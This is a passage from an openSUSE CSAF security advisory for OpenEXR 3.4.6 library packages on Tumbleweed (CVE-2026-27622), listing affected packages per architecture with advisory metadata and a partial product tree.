"category": "impact",
"date": "2026-03-26T10:00:01Z",
"details": "important"
}
],
"title": "CVE-2026-27622"
}
]
}
OPENSUSE-SU-2026:10303-1
Vulnerability from csaf_opensuse - Published: 2026-03-07 00:00 - Updated: 2026-03-07 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "libIex-3_4-33-3.4.6-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the libIex-3_4-33-3.4.6-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10303",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10303-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27622 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27622/"
}
],
"title": "libIex-3_4-33-3.4.6-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-07T00:00:00Z",
"generator": {
"date": "2026-03-07T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10303-1",
"initial_release_date": "2026-03-07T00:00:00Z",
"revision_history": [
{
"date": "2026-03-07T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-3.4.6-1.1.aarch64",
"product_id": "openexr-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-devel-3.4.6-1.1.aarch64",
"product_id": "openexr-devel-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-doc-3.4.6-1.1.aarch64",
"product_id": "openexr-doc-3.4.6-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-3.4.6-1.1.ppc64le",
"product_id": "openexr-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-devel-3.4.6-1.1.ppc64le",
"product_id": "openexr-devel-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-doc-3.4.6-1.1.ppc64le",
"product_id": "openexr-doc-3.4.6-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.s390x",
"product": {
"name": "openexr-3.4.6-1.1.s390x",
"product_id": "openexr-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.s390x",
"product": {
"name": "openexr-devel-3.4.6-1.1.s390x",
"product_id": "openexr-devel-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.s390x",
"product": {
"name": "openexr-doc-3.4.6-1.1.s390x",
"product_id": "openexr-doc-3.4.6-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
